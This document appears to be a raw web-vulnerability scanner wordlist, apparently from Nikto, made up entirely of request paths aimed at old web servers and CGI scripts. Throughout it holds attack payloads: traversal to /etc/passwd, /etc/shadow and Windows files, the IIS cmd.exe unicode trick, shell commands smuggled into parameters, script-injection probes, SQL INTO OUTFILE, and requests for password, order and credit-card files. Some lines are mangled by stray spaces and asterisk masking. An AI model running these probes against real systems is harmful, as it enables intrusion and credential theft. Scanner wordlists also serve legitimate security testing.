/cfdocs/exampleapp/publish/
/cfdocs/exampleapp/email/getfile.cfm?filename:=c:\boot.ini
/cfdocs/exampleapp/email/
/cfdocs/
/ccard/
/catalyst/exec/show/config/cr
/catalog.nsf
/cart/
/carbo.dll
/bin/scripts/Fpadmcgi.exe
/bin/fpremadm.exe
/bin/fpadmin.htm
/bin/contents.htm
/bin/cfgwiz.exe
/bin/admin.pl
/bin/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/Album/
/AdvWorks/equipment/catalog_type.asp
/adsamples/config/site.csc
/admisapi/fpadmin.htm
/admin-serv/config/admpw
/admin-serv/config/adm.conf
/admin4.nsf
/admin/passwd.txt
/admin/passwd.html
/admin/
/admin.php3
/Admin
/admcgi/contents.htm
/admcgi/
/access/
/~wsapi/cfusion
/~root
/~nobody/etc/
/~ftp
/~admin
/_vti_pvt/users.pwd
/_vti_pvt/shtml.exe
/_vti_pvt/shtml.dll
/_vti_pvt/services.cnf
/_vti_pvt/service.pwd
/_vti_pvt/service.cnf
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/access.cnf
/_vti_pvt/_vti_cnf
/_vti_inf.html
/_vti_cnf
/_vti_bin/shtml.exe
/_vti_bin/_vti_cnf
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_adm
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_private/shopping_cart.mdb
/_private/registrations.txt
/_private/registrations.htm
/_private/registration.cgi
/_private/register.txt
/_private/register.htm
/_private/orders.htm
/_private/form_results.txt
/_private/form_results.pl
/_private/form_results.htm
/_private/form_results.cgi
/_private/
/_AuthChangeUrl?
/__vti_inf.html
/?wp-ver-info
/?wp-cs-dump
/?PageServices
//cgi-bin/
/.secure/etc/passwd
/.htpasswd
/.html/............./config.sys
/.htaccess
/../config/html/cnf_gi.htm
/../../../../../../../../../../etc/passwd
/....../Winnt/Admin.pwl
/....../Windows/Admin.pwl
/....../etc/shadow
/....../etc/security/passwd.adjunct
/....../etc/security/passwd
/....../etc/passwd
/....../etc/master.passwd
/....../autoexec.bat
/....../
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-sys/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-local/../../../../../../../../../../WINNT/system32/ipconfig.exe
/htbin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgibin/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgis/../../../../../../../../../../WINNT/system32/ipconfig.exe
/scripts/../../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-win/../../../../../../../../../../WINNT/system32/ipconfig.exe
/bin//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-sys//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-local//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/htbin//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgibin//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgis//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/scripts//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-win//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/bin//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-bin//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-sys//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-local//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/htbin//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgibin//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgis//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/scripts//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/cgi-win//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/?M=A)
/.DS_Store)
/.FBCIndex)
/.htaccess)
/docs/)
/server-info)
/server-status)
/stronghold-info)
/stronghold-status)
/cgi-bin/main_menu.pl)
/php/php.exe?c:boot.ini)
/servlets/MsgPage?action=badlogin&msg=<******>alert('Vulnera ble')</******>)
/site/eg/source.asp)
/~nobody/etc/passwd)
/bin/.htaccess
/cgi/.htaccess
/cgi-bin/.htaccess
/cgi-sys/.htaccess
/cgi-local/.htaccess
/htbin/.htaccess
/cgibin/.htaccess
/cgis/.htaccess
/scripts/.htaccess
/cgi-win/.htaccess

/.wwwacl)
/.www_acl)
/bin/.wwwacl
/cgi/.wwwacl
/cgi-bin/.wwwacl
/cgi-sys/.wwwacl
/cgi-local/.wwwacl
/htbin/.wwwacl
/cgibin/.wwwacl
/cgis/.wwwacl
/scripts/.wwwacl
/cgi-win/.wwwacl
/bin/.www_acl
/cgi/.www_acl
/cgi-bin/.www_acl
/cgi-sys/.www_acl
/cgi-local/.www_acl
/htbin/.www_acl
/cgibin/.www_acl
/cgis/.www_acl
/scripts/.www_acl
/cgi-win/.www_acl
/bin/ls
/cgi/ls
/cgi-bin/ls
/cgi-sys/ls
/cgi-local/ls
/htbin/ls
/cgibin/ls
/cgis/ls
/scripts/ls
/cgi-win/ls
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/<******>alert('Vulnerable')</******>
/<******>alert('Vulnerable')</******>.jsp
/<******>alert('Vulnerable')</******>.shtml
/<******>alert('Vulnerable')</******>.thtml
/comments.php?subject=<******>alert('Vulnerable')</******>&comment=<******>alert('Vulnerable')</******>&pid=0&sid=0&mode=&order=&thold=op=Preview)
/%00/)
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd)
/%3f.jsp)
/../../../../../../../../../../etc/passwd)
/./)
//etc/passwd
/a/)
/access-log
/access.lo
/access/
/account/)
/accounting/)
/active.log)
/admin.cgi)
/admin.htm)
/admin.html)
/admin.php)
/admin.php3)
/admin.shtml)
/admin/)
/admin/contextAdmin/contextAdmin.html)
/Administration/)
/administration/)
/administrator/)
/Admin_files/)
/akopia/)
/analog/)
/app/)
/apps/)
/archive/)
/asp/)
/atc/)
/awebvisit.stat)
/backup/)
/bak/)
/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK)
/beta/)
/bigconf.cgi)
/bin/)
/buy/)
/buynow/)
/c/)
/c32web.exe/ChangeAdminPassword)
/cache-stats/)
/cart/)
/catinfo)
/ccard/)
/cfcache.map)
/cfide/Administrator/startstop.html)
/class/mysql.class)
/code/)
/config/)
/counter/)
/cpanel/)
/credit/)
/customers/)
/dan_o.dat)
/dat/)
/data/)
/database/)
/databases/)
/db/)
/dbase/)
/dev/)
/devel/)
/development/)
/DMR/)
/doc-html/)
/down/)
/download.php?sortby=&dcategory=<******>alert('Vuln erable')</******>)
/download/)
/downloads/)
/easylog/easylog.html)
/employees/)
/examples/jsp/snp/anything.snp)
/exe/)
/file-that-is-not-real-2002.php3)
/file/)
/files/)
/forum/)
/fpadmin/)
/friend.php?op=SiteSent&fname=<******>alert('Vulner able')</******>)
/ftp/)
/guestbook/)
/guests/)
/help/)
/hidden/)
/hitmatic/)
/hitmatic/analyse.cgi)
/hits.txt)
/hit_tracker/)
/home/)
/htdocs/)
/html/)
/HyperStat/stat_what.log)
/hyperstat/stat_what.log)
/ibill/)
/idea/)
/ideas/)
/images/)
/img-sys/)
/import/)
/inc/sendmail.inc)
/includes/)
/incoming/)
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..% 2F%2Fetc)
/index.php?page=../../../../../../../../../../etc/passwd)
/info/)
/install/)
/interchange/)
/intranet/)
/java-sys/)
/java/)
/javadoc/)
/jdbc/)
/lib/)
/library/)
/log.htm)
/log.html)
/log.txt)
/log/)
/logfile)
/logfile.htm)
/logfile.html)
/logfile.txt)
/logfile/)
/logfiles/)
/logger.html)
/logger/)
/logging/)
/login/)
/logs.txt)
/logs/)
/logs/access_log)
/mail/)
/mall_log_files/)
/manage/cgi/cgiproc)
/manual.php)
/manual/)
/marketing/)
/members/)
/ministats/admin.cgi)
/misc/)
/mkstats/)
/mlog.phtml)
/modules.php?name=Downloads&d_op=viewdownloaddetail s&lid=02&ttitle=<******>alert('Vulnerable')</******>")
/modules.php?op=modload&name=DMOZGateway&file=index &topic=<******>alert('Vulnerable')</******>)
/modules.php?op=modload&name=Members_List&file=inde x&letter=<******>alert('Vulnerable')</******>)
/modules.php?op=modload&name=Xforum&file=<******>al ert('Vulnerable')</******>&fid=2)
/modules.php?op=modload&name=Xforum&file=member&act ion=viewpro&member=<******>alert('Vulnerable')</******>)
/msql/)
/mylog.phtml)
/ncl_items.html)
/ncl_items.shtml?SUBJECT=1)
/new/)
/newuser?Image=../../database/rbsserv.mdb)
/nikto-whatever-badfile.jsp)
/nikto_badfile.shtml)
/odbc/)
/old/)
/opendir.php?/etc/passwd)
/oracle/)
/order/)
/orders/)
/outgoing/)
/pages/)
/passwd)
/passwd.txt)
/password)
/passwords.txt)
/passwords/)
/PDG_Cart/)
/perl/)
/perl5/)
/php/)
/phpinfo.php)
/phpinfo.php3)
/phptonuke.php?filnavn=<******>alert(********.cooki e)</******>)
/piranha/secure/passwd.php3)
/private/)
/pub/)
/public/)
/purchase/)
/purchases/)
/pw/)
/quikstore.cfg)
/register/)
/registered/)
/replymsg.php?send=1&destin=<******>alert('Vulnerab le')</******>)
/reports/)
/reseller/)
/restricted/)
/retail/)
/reviews/newpro.cgi)
/robots.txt)
/root/)
/sales/)
/scripts)
/scripts/weblog)
/search.vts)
/search/)
/search97.vts)
/secret/)
/secure/)
/securecontrolpanel/)
/secured/)
/sell/)
/server_stats/)
/setup/)
/shop/)
/shopper/)
/site/iissamples/)
/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&ac count=administrator)
/software/)
/source/)
/sql/)
/src/)
/srchadm)
/ss.cfg)
/ssi/)
/staff/)
/stat.htm)
/stat/)
/statistic/)
/statistics/)
/stats.htm)
/stats.html)
/stats.txt)
/Stats/)
/stats/)
/status/)
/store/)
/StoreDB/)
/submit.php?subject=<******>alert('Vulnerable')</******>&story=<******>alert('Vulnerable')</******>&storyext=<******>alert('Vulnerable')</******>&op=Preview")
/super_stats/access_logs)
/support/)
/sys/)
/system/)
/temp/)
/test/)
/testing/)
/tmp/)
/tools/)
/trafficlog/)
/tree/)
/updates/)
/usage/)
/user.php?op=userinfo&uname=<******>alert('hi');</******>)
/user/)
/users/)
/ustats/)
/vfs/)
/w3perl/admin)
/warez/)
/web/)
/web800fo/)
/webaccess.htm)
/webaccess/access-options.txt)
/webadmin/)
/webalizer/)
/webboard/)
/webcart-lite/)
/webcart/)
/webdata/)
/weblog/)
/weblogs/)
/webmail/)
/WebShop/)
/website/)
/webstats/)
/WebTrend/)
/Web_store/)
/wstats/)
/WS_FTP.ini)
/ws_ftp.ini)
/wusage/)
/www-sql/)
/www/)
/wwwjoin/)
/wwwlog/)
/wwwstats.html)
/wwwstats/)
/zipfiles/)
/_private/)
/~root/)
/Admin/)
/Admin_files/order.log)
/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=< ******>alert('Vulnerable')</******>)
/bb-dnbd/faxsurvey)
/bugzilla/long_list.cgi?buglist=1%20INTO%20OUTFILE%20%27/tmp/nikto_scan_created_this%27)
/cartcart.cgi)
/cfappman/index.cfm)
/cfdocs/cfcache.map)
/cfdocs/cfmlsyntaxcheck.cfm)
/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:boot.ini)
/cfdocs/exampleapp/email/application.cfm)
/cfdocs/exampleapp/email/getfile.cfm?filename=c:boot.ini)
/cfdocs/exampleapp/publish/admin/addcontent.cfm)
/cfdocs/exampleapp/publish/admin/application.cfm)
/cfdocs/examples/cvbeans/beaninfo.cfm)
/cfdocs/examples/httpclient/mainframeset.cfm)
/cfdocs/examples/parks/detail.cfm)
/cfdocs/expeval/displayopenedfile.cfm)
/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:boot.ini)
/cfdocs/expeval/openfile.cfm)
/cfdocs/expeval/sendmail.cfm)
/cfdocs/snippets/evaluate.cfm)
/cfdocs/snippets/fileexists.cfm)
/cfdocs/snippets/gettempdirectory.cfm)
/cfdocs/snippets/viewexample.cfm)
/CFIDE/administrator/index.cfm)
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:windowswin.ini)
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:winntwin.ini)
/cgi-bin-sdb/printenv)
/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi)
/cgi-bin/bigconf.cgi)
/cgi-bin/common/listrec.pl)
/cgi-bin/dbmlparser.exe)
/cgi-bin/handler)
/cgi-bin/icat)
/cgi-bin/MachineInfo)
/cgi-bin/pfdisplay.cgi)
/cgi-bin/webdist.cgi)
/cgi-bin/wrap)
/cgi-local/cgiemail-1.4/cgicso?query=<******>alert('Vulnerable')</******>)
/cgi-local/cgiemail-1.4/cgicso?query=AAA)
/cgi-local/cgiemail-1.6/cgicso?query=<******>alert('Vulnerable')</******>)
/cgi-local/cgiemail-1.6/cgicso?query=AAA)
/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00)
/cgi-sys/addalink.cgi)
/cgi-sys/cgiecho)
/cgi-sys/cgiemail)
/cgi-sys/countedit)
/cgi-sys/domainredirect.cgi)
/cgi-sys/entropybanner.cgi)
/cgi-sys/entropysearch.cgi)
/cgi-sys/FormMail-clone.cgi)
/cgi-sys/helpdesk.cgi)
/cgi-sys/mchat.cgi)
/cgi-sys/randhtml.cgi)
/cgi-sys/realhelpdesk.cgi)
/cgi-sys/realsignup.cgi)
/cgi-sys/scgiwrap)
/cgi-sys/signup.cgi)
/cgi/cgiproc?)
/cgis/wwwboard/wwwboard.cgi)
/cgis/wwwboard/wwwboard.pl)
/counter/1/n/n/0/3/5/0/a/123.gif)
/dc/auth_data/auth_user_file.txt)
/dc/orders/orders.txt)
/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00)
/dcshop/auth_data/auth_user_file.txt)
/dcshop/orders/orders.txt)
/doc/)
/doc/packages/)
/etc/)
/etc/passwd)
/ews/ews/architext_query.pl)
/exec/show/config/cr)
/forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK)
/html/cgi-bin/cgicso?query=<******>alert('Vulnerable')</******>)
/html/cgi-bin/cgicso?query=AAA)
/interscan/cgi-bin/FtpSave.dll?I'm%20Here)
/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini)
/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd)
/mailman/listinfo/<******>alert('Vulnerable')</******>")
/mall_log_files/order.log)
/officescan/cgi/jdkRqNotify.exe)
/orders/checks.txt)
/orders/mountain.cfg)
/orders/orders.log)
/orders/orders.txt)
/ows-bin/perlidlc.bat?&dir)
/pccsmysqladm/incs/dbconnect.inc)
/PDG_Cart/oder.log)
/PDG_Cart/shopper.conf)
/php/mlog.phtml)
/php/mylog.phtml)
/phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi 4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK)
/phprocketaddin/?page=../../../../../../../../../../etc/passwd)
/pub/english.cgi?op=rmail)
/pw/storemgr.pw)
/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00)
/scripts/wsisa.dll/WService=anything?WSMadmin")
/search97cgi/s97_cgi)
/servlet/allaire.jrun.ssi.SSIFilter)
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter)
/servlet/com.unify.servletexec.UploadServlet)
/servlet/sunexamples.BBoardServlet)
/session/admnlogin)
/session/sendmail)
/SiteScope/htdocs/SiteScope.html)
/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd)
/users/scripts/submit.cgi)
/webcart-lite/orders/import.txt)
/webcart/carts/)
/webcart/config/)
/webcart/config/clients.txt)
/webcart/orders/)
/webcart/orders/import.txt)
/WebShop/logs/cc.txt)
/WebShop/templates/cc.txt)
/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html)
/wwwboard/passwd.txt)
/wwwboard/wwwboard.cgi)
/wwwboard/wwwboard.pl)
/wwwthreads/3tvars.pm)
/wwwthreads/w3tvars.pm)
/xsql/demo/adhocsql/query.xsql?sql=select%20username%20from%20ALL_USER S)
/xsql/demo/airport/airport.xsql?xml-**********=none)
/bin/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgi/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgi-bin/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgi-sys/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgi-local/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/htbin/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgibin/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgis/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/scripts/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/cgi-win/alibaba.pl|dir%20..\..\..\..\..\..\..\,
/bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-sys/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-local/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/htbin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgibin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgis/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/scripts/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/cgi-win/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
/bin/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgi/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgi-sys/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgi-local/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/htbin/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgibin/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgis/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/scripts/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/cgi-win/FormHandler.cgi?realname=aaa&email=aaa&reply_messa ge_template=%2Fetc%2Fpasswd&reply_message_from=sq% 40cirt.netg&redirect=http%3A%2F%2Fwww.cirt.net&rec ipient=sq%40cirt.net
/bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-sys/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-local/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/htbin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgibin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgis/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/scripts/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-win/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/bin/shop.pl/page=;cat%20shop.pl|
/cgi/shop.pl/page=;cat%20shop.pl|
/cgi-bin/shop.pl/page=;cat%20shop.pl|
/cgi-sys/shop.pl/page=;cat%20shop.pl|
/cgi-local/shop.pl/page=;cat%20shop.pl|
/htbin/shop.pl/page=;cat%20shop.pl|
/cgibin/shop.pl/page=;cat%20shop.pl|
/cgis/shop.pl/page=;cat%20shop.pl|
/scripts/shop.pl/page=;cat%20shop.pl|
/cgi-win/shop.pl/page=;cat%20shop.pl|
/bin/
/cgi/
/cgi-bin/
/cgi-sys/
/cgi-local/
/htbin/
/cgibin/
/cgis/
/scripts/
/cgi-win/
/bin/
/cgi/
/cgi-bin/
/cgi-sys/
/cgi-local/
/htbin/
/cgibin/
/cgis/
/scripts/
/cgi-win/
/bin/.fhp
/cgi/.fhp
/cgi-bin/.fhp
/cgi-sys/.fhp
/cgi-local/.fhp
/htbin/.fhp
/cgibin/.fhp
/cgis/.fhp
/scripts/.fhp
/cgi-win/.fhp
/bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-sys/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-local/a1disp3.cgi?../../../../../../../../../../etc/passwd
/htbin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgibin/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgis/a1disp3.cgi?../../../../../../../../../../etc/passwd
/scripts/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-win/a1disp3.cgi?../../../../../../../../../../etc/passwd
/bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-sys/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-local/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/htbin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgibin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgis/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/scripts/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/cgi-win/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/bin/addbanner.cgi
/cgi/addbanner.cgi
/cgi-bin/addbanner.cgi
/cgi-sys/addbanner.cgi
/cgi-local/addbanner.cgi
/htbin/addbanner.cgi
/cgibin/addbanner.cgi
/cgis/addbanner.cgi
/scripts/addbanner.cgi
/cgi-win/addbanner.cgi
/bin/add_ftp.cgi
/cgi/add_ftp.cgi
/cgi-bin/add_ftp.cgi
/cgi-sys/add_ftp.cgi
/cgi-local/add_ftp.cgi
/htbin/add_ftp.cgi
/cgibin/add_ftp.cgi
/cgis/add_ftp.cgi
/scripts/add_ftp.cgi
/cgi-win/add_ftp.cgi
/bin/admin.php
/cgi/admin.php
/cgi-bin/admin.php
/cgi-sys/admin.php
/cgi-local/admin.php
/htbin/admin.php
/cgibin/admin.php
/cgis/admin.php
/scripts/admin.php
/cgi-win/admin.php
/bin/admin.php3
/cgi/admin.php3
/cgi-bin/admin.php3
/cgi-sys/admin.php3
/cgi-local/admin.php3
/htbin/admin.php3
/cgibin/admin.php3
/cgis/admin.php3
/scripts/admin.php3
/cgi-win/admin.php3
/bin/admin.pl
/cgi/admin.pl
/cgi-bin/admin.pl
/cgi-sys/admin.pl
/cgi-local/admin.pl
/htbin/admin.pl
/cgibin/admin.pl
/cgis/admin.pl
/scripts/admin.pl
/cgi-win/admin.pl
/bin/aglimpse
/cgi/aglimpse
/cgi-bin/aglimpse
/cgi-sys/aglimpse
/cgi-local/aglimpse
/htbin/aglimpse
/cgibin/aglimpse
/cgis/aglimpse
/scripts/aglimpse
/cgi-win/aglimpse
/bin/aglimpse.cgi
/cgi/aglimpse.cgi
/cgi-bin/aglimpse.cgi
/cgi-sys/aglimpse.cgi
/cgi-local/aglimpse.cgi
/htbin/aglimpse.cgi
/cgibin/aglimpse.cgi
/cgis/aglimpse.cgi
/scripts/aglimpse.cgi
/cgi-win/aglimpse.cgi
/bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgi/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-sys/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-local/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/htbin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgibin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgis/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/scripts/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/cgi-win/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F.. %2F..%2F..%2Fetc&dispsize=640&start=0
/bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-sys/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-local/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/htbin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgibin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgis/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/scripts/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/cgi-win/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
/bin/AnyBoard.cgi
/cgi/AnyBoard.cgi
/cgi-bin/AnyBoard.cgi
/cgi-sys/AnyBoard.cgi
/cgi-local/AnyBoard.cgi
/htbin/AnyBoard.cgi
/cgibin/AnyBoard.cgi
/cgis/AnyBoard.cgi
/scripts/AnyBoard.cgi
/cgi-win/AnyBoard.cgi
/bin/AnyForm
/cgi/AnyForm
/cgi-bin/AnyForm
/cgi-sys/AnyForm
/cgi-local/AnyForm
/htbin/AnyForm
/cgibin/AnyForm
/cgis/AnyForm
/scripts/AnyForm
/cgi-win/AnyForm
/bin/AnyForm2
/cgi/AnyForm2
/cgi-bin/AnyForm2
/cgi-sys/AnyForm2
/cgi-local/AnyForm2
/htbin/AnyForm2
/cgibin/AnyForm2
/cgis/AnyForm2
/scripts/AnyForm2
/cgi-win/AnyForm2
/bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
